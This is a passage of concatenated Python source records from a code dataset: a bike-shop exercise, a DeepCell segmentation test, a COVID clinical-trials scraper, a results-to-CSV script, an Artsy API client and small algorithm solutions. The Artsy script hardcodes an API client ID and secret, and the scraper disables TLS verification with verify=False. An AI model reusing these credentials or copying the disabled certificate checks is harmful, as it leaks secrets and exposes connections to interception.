float(model.prodcost)*pftmrg \n print(\"{0:<8}: ${1}\".format(model.modelname, float(model.prodcost)*pftmrg)) \n\n\n#Create three customers. One customer has a budget of $200, the second $500, \n#and the third $1000. \ncustomer1 = bi.Customers(\"James Walker\", 200)\ncustomer2 = bi.Customers(\"Greg Parsons\", 500)\ncustomer3 = bi.Customers(\"Joe Blogger\", 1000)\n\n\n#Print the name of each customer, and a list of the bikes offered by the bike \n#shop that they can afford given their budget.\nprint()\nfor customer in [customer1,customer2, customer3]: \n print()\n print(\"With\", \"$\"+str(customer.bikefund),customer.customername,\"can afford.\") \n for model in inventory: \n if customer.bikefund >= float(model.prodcost)*1.2:\n print(\"{0:<8}: ${1}\".format(model.modelname, model.prodcost)) \n \n#Have each of the three customers purchase a bike then print the name \n#of the bike the customer purchased, the cost, and how much\n#money they have left over in their bicycle fund \nprint()\npurchasedbikes =[]\nfor cust in [customer1, customer2, customer3]:\n buys =[] \n print()\n for model in inventory: \n if cust.bikefund >= float(model.prodcost)*1.2:\n buys.append(model.modelname)\n pick=random.choice(buys)\n purchasedbikes.append(pick) \n print(cust.customername, \"bought...\")\n print(\"A {0} for ${1}\".format(pick,stocks[pick])) \n for model in inventory:\n if model.modelname == pick:\n inventory.remove(model)\n\n\n#print how much profit the shop has made selling the three bikes.\nprofit =[]\nfor bike, price in stocks.items():\n if bike in purchasedbikes:\n profit.append(price - price/pftmrg)\nprint()\nprint(\"{0} has made a profit of ${1}\".format(bikeshop1.shopname,sum(profit)))\n \n#print new inventory, inventory is only cost to produce items\nprint()\nprint(\"Items remaining in store for sale store are...\")\nfor model in inventory:\n print(\"A {0:<8}: ${1}\".format(model.modelname, stocks[model.modelname]))\n\n\n\n","sub_path":"bicycle_industry/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202414410","text":"import h5py\nimport tifffile as tiff\nfrom keras.backend.common import _UID_PREFIXES\n\nfrom cnn_functions import nikon_getfiles, get_image, run_models_on_directory, get_image_sizes, segment_nuclei, segment_cytoplasm, dice_jaccard_indices\nfrom model_zoo import sparse_bn_feature_net_61x61 as cyto_fn\nfrom model_zoo import sparse_bn_feature_net_61x61 as nuclear_fn\n\nimport os\nimport numpy as np\n\ndirec_name = '/home/ubuntu/DeepCell/validation_data/HeLa/'\ndata_location = os.path.join(direc_name, 'RawImages')\n\ncyto_location = os.path.join(direc_name, 'Cytoplasm')\nnuclear_location = os.path.join(direc_name, 'Nuclear')\nmask_location = os.path.join(direc_name, 'Masks')\n\ncyto_channel_names = ['phase', 'farred']\nnuclear_channel_names = ['farred']\n\ntrained_network_cyto_directory = \"/home/ubuntu/DeepCell/trained_networks/HeLa/\"\ntrained_network_nuclear_directory = \"/home/ubuntu/DeepCell/trained_networks/Nuclear/\"\n\ncyto_prefix = \"2017-06-21_HeLa_all_61x61_bn_feature_net_61x61_\"\nnuclear_prefix = \"2016-07-12_nuclei_all_61x61_bn_feature_net_61x61_\"\n\nwin_cyto = 30\nwin_nuclear = 30\n\nimage_size_x, image_size_y = get_image_sizes(data_location, nuclear_channel_names)\nimage_size_x /= 2\nimage_size_y /= 2\n\nlist_of_cyto_weights = []\nfor j in xrange(5):\n\tcyto_weights = os.path.join(trained_network_cyto_directory, cyto_prefix + str(j) + \".h5\")\n\tlist_of_cyto_weights += [cyto_weights]\n\nlist_of_nuclear_weights = []\nfor j in xrange(5):\n\tnuclear_weights = os.path.join(trained_network_nuclear_directory, nuclear_prefix + str(j) + \".h5\")\n\tlist_of_nuclear_weights += [nuclear_weights]\n\ncytoplasm_predictions = run_models_on_directory(data_location, cyto_channel_names, cyto_location, model_fn = cyto_fn, \n\tlist_of_weights = list_of_cyto_weights, image_size_x = image_size_x, image_size_y = image_size_y, \n\twin_x = win_cyto, win_y = win_cyto, std = False, split = False)\n\nnuclear_predictions = run_models_on_directory(data_location, nuclear_channel_names, nuclear_location, model_fn = nuclear_fn, \n\tlist_of_weights = list_of_nuclear_weights, image_size_x = image_size_x, image_size_y = image_size_y, \n\twin_x = win_nuclear, win_y = win_nuclear, std = False, split = False)\n\nnuclear_masks = segment_nuclei(nuclear_predictions, mask_location = mask_location, threshold = 0.75, area_threshold = 100, solidity_threshold = 0.75, eccentricity_threshold = 0.95)\ncytoplasm_masks = segment_cytoplasm(cytoplasm_predictions, nuclear_masks = nuclear_masks, mask_location = mask_location, smoothing = 1, num_iters = 120)\n\ndirec_val = os.path.join(direc_name, 'Validation')\nimglist_val = nikon_getfiles(direc_val, 'validation_interior')\n\nval_name = os.path.join(direc_val, imglist_val[0]) \nval = get_image(val_name)\nval = val[win_cyto:-win_cyto,win_cyto:-win_cyto]\ncyto = cytoplasm_masks[0,win_cyto:-win_cyto,win_cyto:-win_cyto]\nnuc = nuclear_masks[0,win_cyto:-win_cyto,win_cyto:-win_cyto]\n\ndice_jaccard_indices(cyto, val, nuc)","sub_path":"running_convnet_test.py","file_name":"running_convnet_test.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"430535744","text":"import json\nimport csv\nimport requests\nimport re\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nCLINICAL_TRIALS_ROOT_URL = 'https://www.clinicaltrialsregister.eu/ctr-search/search?query=covid-19&country=gb'\nFULL_TRIALS_DOWNLOAD_URL = 'https://www.clinicaltrialsregister.eu/ctr-search/rest/download/full?query=covid-19&country=gb&page={}&mode=current_page'\n\n\ndef find_number_of_pages(ROOT_URL):\n \n root_contents = requests.get(ROOT_URL, verify=False)\n soup = BeautifulSoup(root_contents.content, 'html.parser')\n div_class = soup.find('div', {'class' :'outcome grid_12'}).text\n page_total = re.search(r'Displaying page 1 of (\\d+)', div_class)\n\n TOTAL_PAGES = int(page_total.group(1))\n\n return TOTAL_PAGES\n\n\ndef get_full_trials(DOWNLOAD_URL, TOTAL_PAGES):\n\n # Get full clinical trial info from all pages\n download_full_pages = []\n for i in range(TOTAL_PAGES):\n download_full_pages.append(requests.get(DOWNLOAD_URL.format(i+1), verify=False))\n\n # Merge contents of each page together\n merged_full_download_pages = b''\n for d in download_full_pages:\n merged_full_download_pages += d.content\n with open('data/clinical-trials-full.txt', 'wb') as f:\n f.write(merged_full_download_pages)\n with open('data/clinical-trials-full.txt', encoding=\"utf8\") as f:\n full_trial_data = f.read()\n\n return full_trial_data\n\n\ndef create_list_of_trial_dicts(full_trial_data):\n\n split_full_trial_data = full_trial_data.split('\\nSummary')\n\n # Remove unwanted data\n split_full_trial_data.pop(0)\n\n split_full_trial_data_2 = []\n for trial in split_full_trial_data:\n s = '\\nA.'\n split = [s+e for e in trial.split(s) if e]\n split[0] = split[0][3:]\n split_full_trial_data_2.append(split)\n\n split_full_trial_data_3 = []\n for trial in split_full_trial_data_2:\n s = '\\nB.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_3.append(trial)\n\n split_full_trial_data_4 = []\n for trial in split_full_trial_data_3:\n s = '\\nD.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_4.append(trial)\n\n split_full_trial_data_5 = []\n for trial in split_full_trial_data_4:\n s = '\\nE.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_5.append(trial)\n\n split_full_trial_data_6 = []\n for trial in split_full_trial_data_5:\n s = '\\nF.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_6.append(trial)\n\n split_full_trial_data_7 = []\n for trial in split_full_trial_data_6:\n s = '\\nG.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_7.append(trial)\n\n split_full_trial_data_8 = []\n for trial in split_full_trial_data_7:\n s = '\\nN.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_8.append(trial)\n\n split_full_trial_data_9 = []\n for trial in split_full_trial_data_8:\n s = '\\nP.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_9.append(trial)\n\n for trial in split_full_trial_data_9:\n for i in range(len(trial)):\n trial[i] = trial[i][1:]\n\n split_full_trial_data_10 = []\n for trial in split_full_trial_data_9:\n s = '\\n'\n split = [e for e in trial[0].split(s) if e]\n trial = split + trial[1:]\n split_full_trial_data_10.append(trial)\n\n indices_B = []\n indices_D_3 = []\n indices_D_8 = []\n for trial in split_full_trial_data_10:\n index_B = [i for i in trial if i.startswith('B.1.1 Name of Sponsor:') \\\n or i.startswith('D. IMP Identification')]\n ind_B = []\n for i in index_B:\n ind_B.append(trial.index(i))\n indices_B.append([index_B, ind_B])\n\n index_D_3 = [i for i in trial if i.startswith('D.IMP:') \\\n or i.startswith('D.8 Information on Placebo')]\n ind_D_3 = []\n for i in index_D_3:\n ind_D_3.append(trial.index(i))\n indices_D_3.append([index_D_3, ind_D_3])\n\n index_D_8 = [i for i in trial if i.startswith('D.8 Placebo:') \\\n or i.startswith('E. General Information on the Trial')]\n ind_D_8 = []\n for i in index_D_8:\n ind_D_8.append(trial.index(i))\n indices_D_8.append([index_D_8, ind_D_8])\n\n for i in range(len(split_full_trial_data_10)):\n for j in range(len(indices_B[i][0])):\n if j < len(indices_B[i][0])-1:\n for k in range(indices_B[i][1][j], indices_B[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'B.S{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n for j in range(len(indices_D_3[i][0])):\n if j < len(indices_D_3[i][0])-1:\n for k in range(indices_D_3[i][1][j], indices_D_3[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'D.I{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n for j in range(len(indices_D_8[i][0])):\n if j < len(indices_D_8[i][0])-1:\n for k in range(indices_D_8[i][1][j], indices_D_8[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'D.P{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n\n # Select lines containing colon\n for trial in split_full_trial_data_10:\n trial[:] = [l for l in trial if any(sub in l for sub in [':'])]\n\n # Make key value pairs\n split_full_trial_data_11 = []\n for i in range(len(split_full_trial_data_10)):\n split_full_trial_data_11.append(dict(s.split(':', 1) for s in split_full_trial_data_10[i]))\n\n # Remove all non GB clinical trials\n count = 0\n for i in range(len(split_full_trial_data_11)):\n for k,v in split_full_trial_data_11[i-count].items():\n if k == 'Link' and '/GB/' not in v:\n split_full_trial_data_11.pop(i-count)\n count += 1\n\n # Strip trailing blank space in value\n for trial in split_full_trial_data_11:\n for k,v in trial.items():\n value = trial[k].strip()\n trial[k] = value\n\n return split_full_trial_data_11\n\n\ndef create_key_for_sections(split_full_trial_data):\n\n A_subsets = []\n B_subsets = []\n D_subsets = []\n E_subsets = []\n F_subsets = []\n G_subsets = []\n N_subsets = []\n P_subsets = []\n Summary_subsets = []\n for trial in split_full_trial_data:\n A_subset = {key: value for key, value in trial.items() if key.startswith('A.')}\n A_subsets.append(A_subset)\n B_subset = {key: value for key, value in trial.items() if key.startswith('B.')}\n B_subsets.append(B_subset)\n D_subset = {key: value for key, value in trial.items() if key.startswith('D.')}\n D_subsets.append(D_subset)\n E_subset = {key: value for key, value in trial.items() if key.startswith('E.')}\n E_subsets.append(E_subset)\n F_subset = {key: value for key, value in trial.items() if key.startswith('F.')}\n F_subsets.append(F_subset)\n G_subset = {key: value for key, value in trial.items() if key.startswith('G.')}\n G_subsets.append(G_subset)\n N_subset = {key: value for key, value in trial.items() if key.startswith('N.')}\n N_subsets.append(N_subset)\n P_subset = {key: value for key, value in trial.items() if key.startswith('P.')}\n P_subsets.append(P_subset)\n Summary_subset = {key: value for key, value in trial.items() if not key.startswith('A.') and not key.startswith('B.') \\\n and not key.startswith('D.') and not key.startswith('E.') and not key.startswith('F.') \\\n and not key.startswith('G.') and not key.startswith('N.') and not key.startswith('P.')}\n Summary_subsets.append(Summary_subset)\n\n for i in range(len(A_subsets)):\n A_subsets[i] = {'A. Protocol Information': A_subsets[i]}\n B_subsets[i] = {'B. Sponsor Information': B_subsets[i]}\n D_subsets[i] = {'D. IMP Identification': D_subsets[i]}\n E_subsets[i] = {'E. General Information on the Trial': E_subsets[i]}\n F_subsets[i] = {'F. Population of Trial Subjects': F_subsets[i]}\n G_subsets[i] = {'G. Investigator Networks to be involved in the Trial': G_subsets[i]}\n N_subsets[i] = {'N. Review by the Competent Authority or Ethics Committee in the country concerned': N_subsets[i]}\n P_subsets[i] = {'P. End of Trial': P_subsets[i]}\n for i in range(len(A_subsets)):\n A_subsets[i].update(B_subsets[i])\n A_subsets[i].update(D_subsets[i])\n A_subsets[i].update(E_subsets[i])\n A_subsets[i].update(F_subsets[i])\n A_subsets[i].update(G_subsets[i])\n A_subsets[i].update(N_subsets[i])\n A_subsets[i].update(P_subsets[i])\n for i in range(len(Summary_subsets)):\n Summary_subsets[i].update(A_subsets[i])\n\n full_trials_list_dict = Summary_subsets\n\n return full_trials_list_dict\n\n\ndef write_json(data, filename, indent=2):\n with open(filename, 'w') as jsonfile:\n json.dump(data, jsonfile, indent=indent)\n\n\ndef write_csv(list_of_flattened_dicts, csv_file):\n df = pd.DataFrame(list_of_flattened_dicts)\n df.to_csv(csv_file, index = None)\n\n\ndef main():\n\n # Find each trial page and merge contents of txt files\n TOTAL_PAGES = find_number_of_pages(CLINICAL_TRIALS_ROOT_URL)\n full_trial_data = get_full_trials(FULL_TRIALS_DOWNLOAD_URL, TOTAL_PAGES)\n\n # Split trial data and write to json and csv format\n split_full_trial_data = create_list_of_trial_dicts(full_trial_data)\n full_trials_list_dict = create_key_for_sections(split_full_trial_data)\n write_json(full_trials_list_dict, 'data/clinical-trials-full.json')\n write_csv(split_full_trial_data, r'data/clinical-trials-full.csv')\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"scripts/clinical-trials-extractor-full.py","file_name":"clinical-trials-extractor-full.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605098292","text":"import argparse\nimport os\nimport re\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--pre_trained\", type=str, default=\"auto_encoder\", help=\"none | auto_encoder | language_model\")\n parser.add_argument(\"--data_folder\", type=str, default=\"ACL\", help=\"ACL | Markov | huffman_tree | two_tree\")\n parser.add_argument(\"--data_type\", type=str, default=\"news\", help=\"movie | news | tweet\")\n parser.add_argument(\"--unlabeled_data_nums\", nargs='+', type=int, default=[20000, 50000, 100000],\n help=\"how many unlabeled data samples was used in pretrain\")\n parser.add_argument(\"--labeled_data_nums\", nargs='+', type=int, default=[200, 500, 1000, 2000, 4000, 6000, 8000],\n help=\"train data samples for each label\")\n parser.add_argument(\"--labels\", nargs='+', type=int, default=[0, 1], help=\"classes to classify\")\n parser.add_argument(\"--positive_label\", type=int, default=1,\n help=\"which label to be positive samples, -1 for average\")\n parser.add_argument(\"--bi_directional\", type=str, default=\"False\", help=\"whether to use bi-directional LSTM\")\n parser.add_argument(\"--hidden_layers_bi\", type=int, default=2,\n help=\"hidden LSTM layer nums if bi_directional is true\")\n parser.add_argument(\"--num_hidden_bi\", type=int, default=100,\n help=\"hidden LSTM cell nums in each layer if bi_directional is true\")\n args = parser.parse_args()\n args.bi_directional = True if args.bi_directional.lower() in (\"yes\", \"true\", \"t\", \"1\") else False\n\n output_file_path = os.path.join(args.pre_trained, args.data_folder, args.data_type,\n 'bit_'.join([str(x) for x in args.labels]) + 'bit_result')\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n output_file_path = os.path.join(output_file_path,\n '_'.join([str(x) for x in args.unlabeled_data_nums]) + '_unlabeled_' + '_'.join(\n [str(x) for x in args.labeled_data_nums]) + '_labeled_positive_' + str(\n args.positive_label) + ('_bi_' + str(args.hidden_layers_bi) + '_' + str(\n args.num_hidden_bi) if args.bi_directional else '') + '.csv')\n\n result_dict = dict()\n for unlabeled_data_num in args.unlabeled_data_nums:\n result_dict[unlabeled_data_num] = dict()\n pre_dir = os.path.join(args.pre_trained, args.data_folder, args.data_type, str(unlabeled_data_num))\n for train_data_num in args.labeled_data_nums:\n result_dict[unlabeled_data_num][train_data_num] = dict()\n file_path = os.path.join(pre_dir, 'bit_'.join([str(x) for x in args.labels]) + 'bit_' + str(train_data_num))\n if args.bi_directional:\n file_path = os.path.join(file_path,\n 'bi_directional_%d_%d' % (args.hidden_layers_bi, args.num_hidden_bi))\n file_path = os.path.join(file_path, 'accuracy.txt')\n with open(file_path, 'r', encoding='utf8') as f:\n lines = f.read().splitlines()\n i = -1\n last_line = lines[i].strip()\n while last_line == '':\n i = i - 1\n last_line = lines[i].strip()\n precisions = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r'precision:[^\\]]+', last_line).group()).group().strip().split()]\n recalls = [float(x) for x in\n re.search(r'[^\\[]+$', re.search(r'recall:[^\\]]+', last_line).group()).group().strip().split()]\n fscores = [float(x) for x in\n re.search(r'[^\\[]+$', re.search(r'fscore:[^\\]]+', last_line).group()).group().strip().split()]\n accuracies = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r' accuracy:[^\\]]+', last_line).group()).group().strip().split()]\n specificities = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r'specificity:[^\\]]+', last_line).group()).group().strip().split()]\n TP = [round(train_data_num * x) for x in recalls]\n FN = [train_data_num - x for x in TP]\n FP = [round(x / y - x) for (x, y) in zip(TP, precisions)]\n TN = [round(train_data_num * (len(args.labels) - 1) * x) for x in specificities]\n average_precision = sum(TP) / (sum(TP) + sum(FP))\n average_recall = sum(TP) / (sum(TP) + sum(FN))\n average_fscore = 2 * average_precision * average_recall / (average_precision + average_recall)\n average_specificity = sum(TN) / (sum(TN) + sum(FP))\n average_accuracy = (sum(TP) + sum(TN)) / (sum(TP) + sum(TN) + sum(FP) + sum(FN))\n\n precisions.append(sum(precisions) / len(precisions))\n recalls.append(sum(recalls) / len(recalls))\n fscores.append(sum(fscores) / len(fscores))\n accuracies.append(sum(accuracies) / len(accuracies))\n specificities.append(sum(specificities) / len(specificities))\n # precisions.append(average_precision)\n # recalls.append(average_recall)\n # fscores.append(average_recall)\n # accuracies.append(average_accuracy)\n # specificities.append(average_specificity)\n\n all_accuracy = float(re.search(r' .+$', re.search(r'all_accuracy:.+$', last_line).group()).group().strip())\n result_dict[unlabeled_data_num][train_data_num]['precision'] = precisions[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['recall'] = recalls[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['fscore'] = fscores[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['specificity'] = specificities[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['accuracy'] = accuracies[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['all_accuracy'] = all_accuracy\n with open(output_file_path, 'w', encoding='utf8') as f:\n f.write(',')\n for unlabeled_data_num in args.unlabeled_data_nums:\n f.write(',' + str(unlabeled_data_num))\n f.write('\\n')\n for train_data_num in args.labeled_data_nums:\n for content in ['precision', 'recall', 'fscore', 'specificity', 'accuracy', 'all_accuracy']:\n f.write(str(train_data_num) + ',' + content)\n for unlabeled_data_num in args.unlabeled_data_nums:\n f.write(',' + str(result_dict[unlabeled_data_num][train_data_num][content]))\n f.write('\\n')\n","sub_path":"result_to_csv.py","file_name":"result_to_csv.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"597073816","text":"import requests\nimport json\n\nclient_id = 'db311cfe37ec4bc74a61'\nclient_secret = 'ba1d22427d386b0b79ce4403c063b2ec'\n\nresp = requests.post(\"https://api.artsy.net/api/tokens/xapp_token\", data={\"client_id\" : client_id, \"client_secret\" : client_secret}).text\ntoken = json.loads(resp)[\"token\"]\n\ndef get_json(url):\n headers = {\"X-Xapp-Token\" : token}\n resp = requests.get(url, headers=headers).text\n return json.loads(resp)\n\nans = []\n\nwith open(\"dataset_24476_4.txt\") as inp:\n for id in inp:\n id = id.rstrip()\n js = get_json(\"https://api.artsy.net/api/artists/\" + id)\n ans.append((js[\"birthday\"], js[\"sortable_name\"]))\n\nans.sort(key=lambda x: (int(x[0]), x[1]))\nprint(\"\\n\".join(map(lambda x: x[1], ans)))","sub_path":"python basics and applications/3/3-6/3-6-2.py","file_name":"3-6-2.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"437561462","text":"class Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\ndef solve():\n try:\n while True:\n x1, y1, x2, y2, x3, y3, x4, y4 = read_and_parse()\n if is_convex(Point(x1, y1), Point(x2, y2), Point(x3, y3), Point(x4, y4)):\n print('YES')\n else:\n print('NO')\n except EOFError:\n pass\n\ndef is_convex(p1, p2, p3, p4):\n v13 = [p3.x - p1.x, p3.y - p1.y]\n v12 = [p2.x - p1.x, p2.y - p1.y]\n v14 = [p4.x - p1.x, p4.y - p1.y]\n\n v21 = [p1.x - p2.x, p1.y - p2.y]\n v23 = [p3.x - p2.x, p3.y - p2.y]\n v24 = [p4.x - p2.x, p4.y - p2.y]\n\n if cross(v13, v12) * cross(v13, v14) < 0 and cross(v24, v21) * cross(v24, v23) < 0:\n return True\n else:\n return False\n\ndef cross(v1, v2):\n return v1[0] * v2[1] - v1[1] * v2[0]\n\ndef read_and_parse():\n return list(map(float, input().strip().split(',')))\n\ndef vector(pa, pb):\n return [pb.x - pa.x, pb.y - pa.y]\n\nif __name__ == '__main__':\n solve()\n import doctest\n doctest.testmod()\n","sub_path":"aoj/0000-/0035.py","file_name":"0035.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172561485","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/08/25 ##\n## Description: Leetcode #007 ##\n##############################################\n\n# Given a 32-bit signed integer, reverse digits of an integer.\n# \n# Example 1:\n# \n# Input: 123\n# Output: 321\n# Example 2:\n# \n# Input: -123\n# Output: -321\n# Example 3:\n# \n# Input: 120\n# Output: 21\n\n# I-No\nclass Solution:\n # @param x: int\n # @return int\n def reverse(self, x):\n bound = [-2**31, 2**31-1]\n xStr = str(x)\n if xStr[0] == '-':\n xStr = xStr[1:]\n sign = '-'\n else:\n sign = ''\n xStr = xStr[::-1]\n for i in range(len(xStr)):\n if xStr[i] != 0:\n break\n else:\n continue\n ans = int(sign+xStr[i:])\n return ans if ans > bound[0] and ans < bound[1] else 0\n\n# I-No\n# More concise\nclass Solution_2:\n # @param x: int\n # @return int\n def reverse(self, x):\n if x < 0:\n y = -int(str(-x)[::-1])\n else:\n y = int(str(x)[::-1])\n return y if y > -2**31 and y < 2**31-1 else 0\n\n# Main\nif __name__ == '__main__':\n print('----- Solution 1 -----')\n print(Solution().reverse(123))\n print(Solution().reverse(-123))\n print(Solution().reverse(1020))\n print(Solution().reverse(1534236469))\n print('----- Solution 2 -----')\n print(Solution_2().reverse(123))\n print(Solution_2().reverse(-123))\n print(Solution_2().reverse(1020))\n print(Solution_2().reverse(1534236469))\n","sub_path":"007_ReverseInteger.py","file_name":"007_ReverseInteger.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118104647","text":"import pandas as pd\nimport numpy as np\nimport os\n\n\nclass SkaterbotDataGenerator:\n train_counter = 0\n train_successful = 0\n validation_counter = 0\n validation_succesful = 0\n test_counter = 0\n test_successful = 0\n n_train = 0\n n_validation = 0\n n_test = 0\n n_test_succesful = 0\n n_samples = 0\n max_time_steps = 100\n\n def __init__(self, dataset_dir: str, csv_name: str,\n time_size: int,\n freq_size: int,\n window_size: float,\n transform_type: str,\n train_test_ratio=0.7,\n validation_ratio=0.2,\n distribution_mode=False):\n \"\"\"\n :param dataset_dir: directory of dataset (depending on window_size)\n :param csv_name: csv-file with the list of data-names. Each sample has an extention \"_offset_x.npy\"\n :param time_size: size of time-dimension of input\n :param freq_size: size of frequency-dimension of input\n :param window_size: size of window used in transform\n :param transform_type: transform-type --> (\"spectrogram\", \"melspectrogram\", \"mfcc\", \"cqt\")\n :param train_test_ratio: train-test splitting ratio\n :param validation_ratio: percentage of train samples that will be used as validation-data\n :param distribution_mode: if\n \"\"\"\n self.__check_ratio(train_test_ratio)\n self.__check_ratio(validation_ratio)\n self.transform_type = self.__check_transform(transform_type, window_size)\n\n self.dataset_dir = dataset_dir\n self.data_dir = os.path.join(dataset_dir, 'data')\n\n self.dataset = self.csv_to_data_list(os.path.join(dataset_dir, csv_name))\n\n self.time_size, self.freq_size, self.window_size = time_size, freq_size, window_size\n\n # Used in classification. if True ==> output = correct-label considers neighbour-label\n self.distribution_mode = distribution_mode\n\n self.train_set, self.validation_set, self.test_set = self.__get_train_test_samples(train_test_ratio,\n validation_ratio)\n\n # Main methods to be used.\n def train_flow(self, batch_size: int, regression_mode=False):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_train_set()\n\n while self.train_counter + batch_size < self.n_train:\n x_train, y_train = self.__make_train_batch(batch_size, regression_mode)\n yield x_train, y_train\n\n rest_of_data = self.n_train - self.train_counter\n if 0 < rest_of_data < batch_size:\n x_train, y_train = self.__make_train_batch(rest_of_data, regression_mode)\n\n yield x_train, y_train\n else:\n raise StopIteration\n\n def validation_flow(self, batch_size: int, regression_mode=False):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_validation_set()\n\n while self.validation_counter + batch_size < self.n_validation:\n x_validation, y_validation = self.__make_validation_batch(batch_size, regression_mode)\n yield x_validation, y_validation\n\n rest_of_data = self.n_validation - self.validation_counter\n if 0 < rest_of_data < batch_size:\n x_validation, y_validation = self.__make_validation_batch(rest_of_data, regression_mode)\n\n yield x_validation, y_validation\n else:\n raise StopIteration\n\n def test_flow(self, batch_size: int, regression_mode=False):\n\n self.test_counter = 0\n\n while self.test_counter + batch_size < self.n_test:\n x_test, y_test = self.__make_test_batch(batch_size, regression_mode)\n yield x_test, y_test\n\n rest_of_data = self.n_test - self.test_counter\n if 0 < rest_of_data < batch_size:\n x_test, y_test = self.__make_test_batch(rest_of_data, regression_mode)\n yield x_test, y_test\n else:\n raise StopIteration\n\n def input_flow(self, batch_size: int):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_input_set()\n\n while self.train_counter + batch_size <= self.n_train:\n x_train = self.__make_input_batch(batch_size)\n yield x_train\n\n rest_of_data = self.n_train - self.train_counter\n if 0 < rest_of_data < batch_size:\n x_train = self.__make_input_batch(batch_size)\n yield x_train\n else:\n raise StopIteration\n\n \"\"\" Other methods \"\"\"\n\n @staticmethod\n def csv_to_data_list(csv_path: str):\n df = pd.read_csv(csv_path)\n return df.to_numpy()[:, 1]\n\n def extract_samplename_and_offset(self, offset_filename):\n offset_idx = offset_filename.find('_offset_')\n\n sample_name = offset_filename[:offset_idx]\n\n offset_path = os.path.join(self.data_dir, sample_name, 'offsets', 'time_size_' + str(self.time_size),\n offset_filename)\n start_idx, end_idx = np.load(offset_path)\n\n return sample_name, start_idx, end_idx\n\n def read_input(self, sample_name: str, start_idx: int, end_idx: int):\n sample_path = os.path.join(self.data_dir,\n sample_name,\n 'inputs',\n sample_name + self.transform_type + '.npy')\n full_transform = np.load(sample_path)\n if start_idx + self.time_size != end_idx:\n raise Exception('SkaterbotDataGeneratorError: the \"time_size\" given does not match'\n 'with the corresponding of the dataset. \"time_size\"s value should be equal '\n 'to ' + str(end_idx - start_idx) + '.')\n x = self.normalize_input(full_transform[start_idx: end_idx, :])\n return x\n\n def read_raw_output(self, sample_name: str, start_idx, end_idx: int):\n sample_path = os.path.join(self.data_dir, sample_name, 'output_raw', sample_name + '.npy')\n pois = np.load(sample_path)\n for poi in pois:\n start_time = start_idx / (1000 / self.window_size)\n end_time = end_idx / (1000 / self.window_size)\n # If no pois correspond to the current input then the sample should be skipped\n if start_time <= poi < end_time:\n \"\"\" poi - start_time so that output sample is withing the range of \"time_size / (1000 / ws)\" \"\"\"\n return np.array([poi - start_time])\n\n def read_output(self, sample_name: str, start_idx, end_idx: int):\n \"\"\"\n :param sample_name: song_name (wav filename)\n :param start_idx: the sub-transform's starting point\n :param end_idx: the sub-transform's ending point\n :param regression_mode: Default value False, if True the output samples are float and in_frame.\n :return: returns output batch\n \"\"\"\n if self.distribution_mode:\n extention = 'output_distribution'\n else:\n extention = 'output'\n sample_path = os.path.join(self.data_dir, sample_name, extention, sample_name + '.npy')\n full_time_size_vector = np.load(sample_path)\n # If no pois correspond to the current input then the sample should be skipped\n if full_time_size_vector[start_idx: end_idx].any():\n return full_time_size_vector[start_idx: end_idx]\n\n # This way if no pois are found in this frame we can use the empty array to skip this step\n return np.array([])\n\n def normalize_input(self, x: 